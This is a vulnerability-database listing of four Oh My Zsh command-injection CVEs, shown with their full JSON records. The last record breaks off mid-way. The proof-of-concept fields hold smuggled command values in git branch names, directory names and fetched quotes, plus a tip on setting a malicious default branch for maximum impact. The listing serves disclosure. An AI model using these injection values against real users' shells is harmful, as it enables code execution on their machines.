Search criteria
5 vulnerabilities by ohmyzsh
CVE-2021-3769 (GCVE-0-2021-3769)
Vulnerability from cvelistv5 – Published: 2021-11-30 09:30 – Updated: 2024-08-03 17:09
VLAI?
Title
OS Command Injection in ohmyzsh/ohmyzsh
Summary
# Vulnerability in `pygmalion`, `pygmalion-virtualenv` and `refined` themes **Description**: these themes use `print -P` on user-supplied strings to print them to the terminal. All of them do that on git information, particularly the branch name, so if the branch has a specially-crafted name the vulnerability can be exploited. **Fixed in**: [b3ba9978](https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978). **Impacted areas**: - `pygmalion` theme. - `pygmalion-virtualenv` theme. - `refined` theme.
Severity ?
7.5 (High)
CWE
- CWE-78 - OS Command Injection
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| ohmyzsh | ohmyzsh/ohmyzsh |
Affected:
unspecified , < b3ba9978
(custom)
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T17:09:08.686Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "ohmyzsh/ohmyzsh",
"vendor": "ohmyzsh",
"versions": [
{
"lessThan": "b3ba9978",
"status": "affected",
"version": "unspecified",
"versionType": "custom"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "# Vulnerability in `pygmalion`, `pygmalion-virtualenv` and `refined` themes **Description**: these themes use `print -P` on user-supplied strings to print them to the terminal. All of them do that on git information, particularly the branch name, so if the branch has a specially-crafted name the vulnerability can be exploited. **Fixed in**: [b3ba9978](https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978). **Impacted areas**: - `pygmalion` theme. - `pygmalion-virtualenv` theme. - `refined` theme."
}
],
"exploits": [
{
"lang": "en",
"value": "**Exploit PoC**:\n\n1. Install Oh My Zsh.\n2. Enable the `pygmalion`, `pygmalion-virtualenv` or `refined` themes.\n3. Create and `cd` into a new git repository: `git init bad-repo \u0026\u0026 cd bad-repo`.\n4. Create and switch to a new branch with a name containing either `$(\u003cinjected-command\u003e`, \u003ccode\u003e\\`\\\u003cinjected-command\\\u003e\\`\u003c/code\u003e or `${(e):-\"\u003cinjected-command\u003e\"}`:\n\n ```sh\n badbranch=\u0027feat/bad-branch$(id\u003e/dev/tty)\u0027\n git checkout -b \"$badbranch\"\n ```\n\n In the `pygmalion` theme, the prompt changes changes from the default branch to:\n\n ```console\n user@host:~/exploit-poc|master \u21d2 badbranch=\u0027feat/bad-branch$(id\u003e/dev/tty)\u0027; git checkout -b \"$badbranch\"\n Switched to a new branch \u0027feat/bad-branch$(id\u003e/dev/tty)\u0027\n uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n user@host:~/exploit-poc|feat/bad-branch \u21d2 \n ```\n\n A similar thing happens in `pygmalion-virtualenv` and `refined` themes.\n\nNOTE: for maximum impact, you can define the malicious branch name as the default branch name in GitHub, so that when a user clones it for the first time and enters the repository, the malicious branch is automatically checked out. That means that the user only needs to clone and enter the repository for the exploit to work.\n"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78 OS Command Injection",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-11-30T09:30:18",
"orgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
"shortName": "@huntrdev"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978"
}
],
"title": "OS Command Injection in ohmyzsh/ohmyzsh",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security@huntr.dev",
"ID": "CVE-2021-3769",
"STATE": "PUBLIC",
"TITLE": "OS Command Injection in ohmyzsh/ohmyzsh"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "ohmyzsh/ohmyzsh",
"version": {
"version_data": [
{
"version_affected": "\u003c",
"version_value": "b3ba9978"
}
]
}
}
]
},
"vendor_name": "ohmyzsh"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "# Vulnerability in `pygmalion`, `pygmalion-virtualenv` and `refined` themes **Description**: these themes use `print -P` on user-supplied strings to print them to the terminal. All of them do that on git information, particularly the branch name, so if the branch has a specially-crafted name the vulnerability can be exploited. **Fixed in**: [b3ba9978](https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978). **Impacted areas**: - `pygmalion` theme. - `pygmalion-virtualenv` theme. - `refined` theme."
}
]
},
"exploit": [
{
"lang": "en",
"value": "**Exploit PoC**:\n\n1. Install Oh My Zsh.\n2. Enable the `pygmalion`, `pygmalion-virtualenv` or `refined` themes.\n3. Create and `cd` into a new git repository: `git init bad-repo \u0026\u0026 cd bad-repo`.\n4. Create and switch to a new branch with a name containing either `$(\u003cinjected-command\u003e`, \u003ccode\u003e\\`\\\u003cinjected-command\\\u003e\\`\u003c/code\u003e or `${(e):-\"\u003cinjected-command\u003e\"}`:\n\n ```sh\n badbranch=\u0027feat/bad-branch$(id\u003e/dev/tty)\u0027\n git checkout -b \"$badbranch\"\n ```\n\n In the `pygmalion` theme, the prompt changes changes from the default branch to:\n\n ```console\n user@host:~/exploit-poc|master \u21d2 badbranch=\u0027feat/bad-branch$(id\u003e/dev/tty)\u0027; git checkout -b \"$badbranch\"\n Switched to a new branch \u0027feat/bad-branch$(id\u003e/dev/tty)\u0027\n uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n user@host:~/exploit-poc|feat/bad-branch \u21d2 \n ```\n\n A similar thing happens in `pygmalion-virtualenv` and `refined` themes.\n\nNOTE: for maximum impact, you can define the malicious branch name as the default branch name in GitHub, so that when a user clones it for the first time and enters the repository, the malicious branch is automatically checked out. That means that the user only needs to clone and enter the repository for the exploit to work.\n"
}
],
"impact": {
"cvss": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-78 OS Command Injection"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978",
"refsource": "MISC",
"url": "https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
"assignerShortName": "@huntrdev",
"cveId": "CVE-2021-3769",
"datePublished": "2021-11-30T09:30:18",
"dateReserved": "2021-09-05T00:00:00",
"dateUpdated": "2024-08-03T17:09:08.686Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-3727 (GCVE-0-2021-3727)
Vulnerability from cvelistv5 – Published: 2021-11-30 09:30 – Updated: 2024-08-03 17:01
VLAI?
Title
OS Command Injection in ohmyzsh/ohmyzsh
Summary
# Vulnerability in `rand-quote` and `hitokoto` plugins **Description**: the `rand-quote` and `hitokoto` fetch quotes from quotationspage.com and hitokoto.cn respectively, do some process on them and then use `print -P` to print them. If these quotes contained the proper symbols, they could trigger command injection. Given that they're an external API, it's not possible to know if the quotes are safe to use. **Fixed in**: [72928432](https://github.com/ohmyzsh/ohmyzsh/commit/72928432). **Impacted areas**: - `rand-quote` plugin (`quote` function). - `hitokoto` plugin (`hitokoto` function).
Severity ?
7.5 (High)
CWE
- CWE-78 - OS Command Injection
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| ohmyzsh | ohmyzsh/ohmyzsh |
Affected:
unspecified , < 72928432
(custom)
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T17:01:08.331Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/ohmyzsh/ohmyzsh/commit/72928432"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "ohmyzsh/ohmyzsh",
"vendor": "ohmyzsh",
"versions": [
{
"lessThan": "72928432",
"status": "affected",
"version": "unspecified",
"versionType": "custom"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "# Vulnerability in `rand-quote` and `hitokoto` plugins **Description**: the `rand-quote` and `hitokoto` fetch quotes from quotationspage.com and hitokoto.cn respectively, do some process on them and then use `print -P` to print them. If these quotes contained the proper symbols, they could trigger command injection. Given that they\u0027re an external API, it\u0027s not possible to know if the quotes are safe to use. **Fixed in**: [72928432](https://github.com/ohmyzsh/ohmyzsh/commit/72928432). **Impacted areas**: - `rand-quote` plugin (`quote` function). - `hitokoto` plugin (`hitokoto` function)."
}
],
"exploits": [
{
"lang": "en",
"value": "**Exploit PoC**:\n\n1. Install Oh My Zsh.\n2. Enable the `rand-quote` or `hitokoto` plugins.\n3. Optional: run `quote` or `hitokoto` functions in a precmd hook:\n\n ```zsh\n add-zsh-hook precmd quote\n add-zsh-hook precmd hitokoto\n ```\n\n4. Wait until a quote from either `quotationspage.com` or `hitokoto.cn` contains either\n `$(\u003cinjected-command\u003e`, \u003ccode\u003e\\`\\\u003cinjected-command\\\u003e\\`\u003c/code\u003e or `${(e):-\"\u003cinjected-command\u003e\"}`.\n\n - For the `rand-quote` plugin, this is how a malicious quote would look like (note the `$(echo PWNED)` part):\n\n ```plain\n ...\n \u003cp\u003eThe following quotations were randomly selected from the collections selected below .\u003c/p\u003e\u003cdl\u003e\u003cdt class=\"quote\"\u003e\u003ca title=\"Click for further information about this quotation\" href=\"/quote/31081.html\"\u003eWhatever you fear most has no power$(echo PWNED) - it is your fear that has the power.\u003c/a\u003e \u003c/dt\u003e\u003cdd class=\"author\"\u003e\u003cdiv class=\"icons\"\u003e\u003ca title=\"Further information about this quotation\" href=\"/quote/31081.html\"\u003e\u003cimg src=\"/icon_info.gif\" width=\"16\" height=\"16\" alt=\"[info]\" border=\"0\"\u003e\u003c/a\u003e\u003ca title=\"Add to Your Quotations Page\" href=\"/myquotations.php?add=31081\"\u003e\u003cimg src=\"/icon_plus.gif\" width=\"16\" height=\"16\" alt=\"[add]\" border=\"0\"\u003e\u003c/a\u003e\u003ca title=\"Email this quotation\" href=\"/quote/31081.html#email\"\u003e\u003cimg src=\"/icon_email.gif\" width=\"16\" height=\"16\" alt=\"[mail]\" border=\"0\"\u003e\u003c/a\u003e\u003cimg src=\"/icon_blank.gif\" width=\"16\" height=\"16\" alt=\"\" border=\"0\"\u003e\u003c/div\u003e\u003cb\u003e\u003ca href=\"/quotes/Oprah_Winfrey/\"\u003eOprah Winfrey\u003c/a\u003e (1954 - )\u003c/b\u003e, \u003ci\u003eO Magazine\u003c/i\u003e\u003c/dd\u003e\n ...\n ```\n\n Which would be printed by `print -P` as:\n\n ```console\n $ quote\n Oprah Winfrey: \u201cWhatever you fear most has no powerPWNED - it is your fear that has the power.\u201d\n ```\n\n Note that it\u0027s possible to submit your own quotes to quotationspage.com so this could be possible if moderators missed it.\n\n - For the `hitokoto` plugin, this is an example of a malicious quote (note the `$(echo PWNED)` part):\n\n ```plain\n {\"id\":7474,\"uuid\":\"0467d7cf-bca2-4cee-81ab-0b0640e51069\",\"hitokoto\":\"\u5979\u62e8\u5f04\u7434\u5f26\uff0c$(echo PWNED)\u626c\u8d77\u6f6e\u6c50\u3002\",\"type\":\"e\",\"from\":\"\u539f\u521b\",\"from_who\":\"\u6211\",\"creator\":\"\u9e22\u5c3e\",\"creator_uid\":9969,\"reviewer\":4756,\"commit_from\":\"web\",\"created_at\":\"1627968443\",\"length\":11}\n ```\n\n Which would be printed by `print -P` as:\n\n ```console\n $ hitokoto\n \u539f\u521b: \u201c\u5979\u62e8\u5f04\u7434\u5f26\uff0cPWNED\u626c\u8d77\u6f6e\u6c50\u3002\u201d\n ```\n\n `hitokoto.cn` also allows adding quotes to the database, so this could also be possible.\n"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78 OS Command Injection",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-11-30T09:30:17",
"orgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
"shortName": "@huntrdev"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/ohmyzsh/ohmyzsh/commit/72928432"
}
],
"title": "OS Command Injection in ohmyzsh/ohmyzsh",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security@huntr.dev",
"ID": "CVE-2021-3727",
"STATE": "PUBLIC",
"TITLE": "OS Command Injection in ohmyzsh/ohmyzsh"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "ohmyzsh/ohmyzsh",
"version": {
"version_data": [
{
"version_affected": "\u003c",
"version_value": "72928432"
}
]
}
}
]
},
"vendor_name": "ohmyzsh"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "# Vulnerability in `rand-quote` and `hitokoto` plugins **Description**: the `rand-quote` and `hitokoto` fetch quotes from quotationspage.com and hitokoto.cn respectively, do some process on them and then use `print -P` to print them. If these quotes contained the proper symbols, they could trigger command injection. Given that they\u0027re an external API, it\u0027s not possible to know if the quotes are safe to use. **Fixed in**: [72928432](https://github.com/ohmyzsh/ohmyzsh/commit/72928432). **Impacted areas**: - `rand-quote` plugin (`quote` function). - `hitokoto` plugin (`hitokoto` function)."
}
]
},
"exploit": [
{
"lang": "en",
"value": "**Exploit PoC**:\n\n1. Install Oh My Zsh.\n2. Enable the `rand-quote` or `hitokoto` plugins.\n3. Optional: run `quote` or `hitokoto` functions in a precmd hook:\n\n ```zsh\n add-zsh-hook precmd quote\n add-zsh-hook precmd hitokoto\n ```\n\n4. Wait until a quote from either `quotationspage.com` or `hitokoto.cn` contains either\n `$(\u003cinjected-command\u003e`, \u003ccode\u003e\\`\\\u003cinjected-command\\\u003e\\`\u003c/code\u003e or `${(e):-\"\u003cinjected-command\u003e\"}`.\n\n - For the `rand-quote` plugin, this is how a malicious quote would look like (note the `$(echo PWNED)` part):\n\n ```plain\n ...\n \u003cp\u003eThe following quotations were randomly selected from the collections selected below .\u003c/p\u003e\u003cdl\u003e\u003cdt class=\"quote\"\u003e\u003ca title=\"Click for further information about this quotation\" href=\"/quote/31081.html\"\u003eWhatever you fear most has no power$(echo PWNED) - it is your fear that has the power.\u003c/a\u003e \u003c/dt\u003e\u003cdd class=\"author\"\u003e\u003cdiv class=\"icons\"\u003e\u003ca title=\"Further information about this quotation\" href=\"/quote/31081.html\"\u003e\u003cimg src=\"/icon_info.gif\" width=\"16\" height=\"16\" alt=\"[info]\" border=\"0\"\u003e\u003c/a\u003e\u003ca title=\"Add to Your Quotations Page\" href=\"/myquotations.php?add=31081\"\u003e\u003cimg src=\"/icon_plus.gif\" width=\"16\" height=\"16\" alt=\"[add]\" border=\"0\"\u003e\u003c/a\u003e\u003ca title=\"Email this quotation\" href=\"/quote/31081.html#email\"\u003e\u003cimg src=\"/icon_email.gif\" width=\"16\" height=\"16\" alt=\"[mail]\" border=\"0\"\u003e\u003c/a\u003e\u003cimg src=\"/icon_blank.gif\" width=\"16\" height=\"16\" alt=\"\" border=\"0\"\u003e\u003c/div\u003e\u003cb\u003e\u003ca href=\"/quotes/Oprah_Winfrey/\"\u003eOprah Winfrey\u003c/a\u003e (1954 - )\u003c/b\u003e, \u003ci\u003eO Magazine\u003c/i\u003e\u003c/dd\u003e\n ...\n ```\n\n Which would be printed by `print -P` as:\n\n ```console\n $ quote\n Oprah Winfrey: \u201cWhatever you fear most has no powerPWNED - it is your fear that has the power.\u201d\n ```\n\n Note that it\u0027s possible to submit your own quotes to quotationspage.com so this could be possible if moderators missed it.\n\n - For the `hitokoto` plugin, this is an example of a malicious quote (note the `$(echo PWNED)` part):\n\n ```plain\n {\"id\":7474,\"uuid\":\"0467d7cf-bca2-4cee-81ab-0b0640e51069\",\"hitokoto\":\"\u5979\u62e8\u5f04\u7434\u5f26\uff0c$(echo PWNED)\u626c\u8d77\u6f6e\u6c50\u3002\",\"type\":\"e\",\"from\":\"\u539f\u521b\",\"from_who\":\"\u6211\",\"creator\":\"\u9e22\u5c3e\",\"creator_uid\":9969,\"reviewer\":4756,\"commit_from\":\"web\",\"created_at\":\"1627968443\",\"length\":11}\n ```\n\n Which would be printed by `print -P` as:\n\n ```console\n $ hitokoto\n \u539f\u521b: \u201c\u5979\u62e8\u5f04\u7434\u5f26\uff0cPWNED\u626c\u8d77\u6f6e\u6c50\u3002\u201d\n ```\n\n `hitokoto.cn` also allows adding quotes to the database, so this could also be possible.\n"
}
],
"impact": {
"cvss": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-78 OS Command Injection"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/ohmyzsh/ohmyzsh/commit/72928432",
"refsource": "MISC",
"url": "https://github.com/ohmyzsh/ohmyzsh/commit/72928432"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
"assignerShortName": "@huntrdev",
"cveId": "CVE-2021-3727",
"datePublished": "2021-11-30T09:30:17",
"dateReserved": "2021-08-19T00:00:00",
"dateUpdated": "2024-08-03T17:01:08.331Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-3726 (GCVE-0-2021-3726)
Vulnerability from cvelistv5 – Published: 2021-11-30 09:30 – Updated: 2024-08-03 17:01
VLAI?
Title
OS Command Injection in ohmyzsh/ohmyzsh
Summary
# Vulnerability in `title` function **Description**: the `title` function defined in `lib/termsupport.zsh` uses `print` to set the terminal title to a user-supplied string. In Oh My Zsh, this function is always used securely, but custom user code could use the `title` function in a way that is unsafe. **Fixed in**: [a263cdac](https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac). **Impacted areas**: - `title` function in `lib/termsupport.zsh`. - Custom user code using the `title` function.
Severity ?
7.5 (High)
CWE
- CWE-78 - OS Command Injection
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| ohmyzsh | ohmyzsh/ohmyzsh |
Affected:
unspecified , < a263cdac
(custom)
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T17:01:08.345Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "ohmyzsh/ohmyzsh",
"vendor": "ohmyzsh",
"versions": [
{
"lessThan": "a263cdac",
"status": "affected",
"version": "unspecified",
"versionType": "custom"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "# Vulnerability in `title` function **Description**: the `title` function defined in `lib/termsupport.zsh` uses `print` to set the terminal title to a user-supplied string. In Oh My Zsh, this function is always used securely, but custom user code could use the `title` function in a way that is unsafe. **Fixed in**: [a263cdac](https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac). **Impacted areas**: - `title` function in `lib/termsupport.zsh`. - Custom user code using the `title` function."
}
],
"exploits": [
{
"lang": "en",
"value": "**Exploit PoC**:\n\n1. Install Oh My Zsh.\n2. Add a custom function that calls `title` to set the terminal title with a user-supplied string.\n For example:\n\n ```sh\n function dirpath_in_title {\n title \"$PWD\"\n }\n add-zsh-hook precmd dirpath_in_title\n ```\n\n3. Create and cd into a directory with a subshell command as its name:\n\n ```sh\n baddir=\u0027`echo pwned \u0026\u0026 id`\u0027\n mkdir \"$baddir\" \u0026\u0026 cd \"$baddir\"\n ```\n\n4. The `title` function incorrectly expands the subshell command (see screenshot):\n\n "
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78 OS Command Injection",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-11-30T09:30:15",
"orgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
"shortName": "@huntrdev"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac"
}
],
"title": "OS Command Injection in ohmyzsh/ohmyzsh",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security@huntr.dev",
"ID": "CVE-2021-3726",
"STATE": "PUBLIC",
"TITLE": "OS Command Injection in ohmyzsh/ohmyzsh"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "ohmyzsh/ohmyzsh",
"version": {
"version_data": [
{
"version_affected": "\u003c",
"version_value": "a263cdac"
}
]
}
}
]
},
"vendor_name": "ohmyzsh"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "# Vulnerability in `title` function **Description**: the `title` function defined in `lib/termsupport.zsh` uses `print` to set the terminal title to a user-supplied string. In Oh My Zsh, this function is always used securely, but custom user code could use the `title` function in a way that is unsafe. **Fixed in**: [a263cdac](https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac). **Impacted areas**: - `title` function in `lib/termsupport.zsh`. - Custom user code using the `title` function."
}
]
},
"exploit": [
{
"lang": "en",
"value": "**Exploit PoC**:\n\n1. Install Oh My Zsh.\n2. Add a custom function that calls `title` to set the terminal title with a user-supplied string.\n For example:\n\n ```sh\n function dirpath_in_title {\n title \"$PWD\"\n }\n add-zsh-hook precmd dirpath_in_title\n ```\n\n3. Create and cd into a directory with a subshell command as its name:\n\n ```sh\n baddir=\u0027`echo pwned \u0026\u0026 id`\u0027\n mkdir \"$baddir\" \u0026\u0026 cd \"$baddir\"\n ```\n\n4. The `title` function incorrectly expands the subshell command (see screenshot):\n\n "
}
],
"impact": {
"cvss": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-78 OS Command Injection"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac",
"refsource": "MISC",
"url": "https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
"assignerShortName": "@huntrdev",
"cveId": "CVE-2021-3726",
"datePublished": "2021-11-30T09:30:15",
"dateReserved": "2021-08-19T00:00:00",
"dateUpdated": "2024-08-03T17:01:08.345Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-3725 (GCVE-0-2021-3725)
Vulnerability from cvelistv5 – Published: 2021-11-30 09:30 – Updated: 2024-08-03 17:01
VLAI?
Title
OS Command Injection in ohmyzsh/ohmyzsh
Summary
Vulnerability in dirhistory plugin Description: the widgets that go back and forward in the directory history, triggered by pressing Alt-Left and Alt-Right, use functions that unsafely execute eval on directory names. If you cd into a directory with a carefully-crafted name, then press Alt-Left, the system is subject to command injection. Impacted areas: - Functions pop_past and pop_future in dirhistory plugin.
Severity ?
7.5 (High)
CWE
- CWE-78 - OS Command Injection
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| ohmyzsh | ohmyzsh/ohmyzsh |
Affected:
unspecified , < 06fc5fb
(custom)
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T17:01:08.297Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/ohmyzsh/ohmyzsh/commit/06fc5fb"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "ohmyzsh/ohmyzsh",
"vendor": "ohmyzsh",
"versions": [
{
"lessThan": "06fc5fb",
"status": "affected",
"version": "unspecified",
"versionType": "custom"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Vulnerability in dirhistory plugin Description: the widgets that go back and forward in the directory history, triggered by pressing Alt-Left and Alt-Right, use functions that unsafely execute eval on directory names. If you cd into a directory with a carefully-crafted name, then press Alt-Left, the system is subject to command injection. Impacted areas: - Functions pop_past and pop_future in dirhistory plugin."
}
],
"exploits": [
{
"lang": "en",
"value": "Exploit PoC:\n\n1. Install Oh My Zsh.\n2. Enable the dirhistory plugin.\n3. Open a terminal and create and cd into a directory like so:\n\n baddir=\"directory\u0027;id;echo \u0027pwned\"\n mkdir \"$baddir\" \u0026\u0026 cd \"$baddir\"\n\n4. Press Alt-Left to go back to previous directory (in macOS, use Option-Left).\n\n5. id and echo pwned are executed:\n\n $ \u003cAlt-Left\u003e\n uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n pwned"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78 OS Command Injection",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-11-30T09:30:14",
"orgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
"shortName": "@huntrdev"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/ohmyzsh/ohmyzsh/commit/06fc5fb"
}
],
"title": "OS Command Injection in ohmyzsh/ohmyzsh",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security@huntr.dev",
"ID": "CVE-2021-3725",
"STATE": "PUBLIC",
"TITLE": "OS Command Injection in ohmyzsh/ohmyzsh"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "ohmyzsh/ohmyzsh",
"version": {
"version_data": [
{
"version_affected": "\u003c",
"version_value": "06fc5fb"
}
]
}
}
]
},
"vendor_name": "ohmyzsh"
}
]
}
},
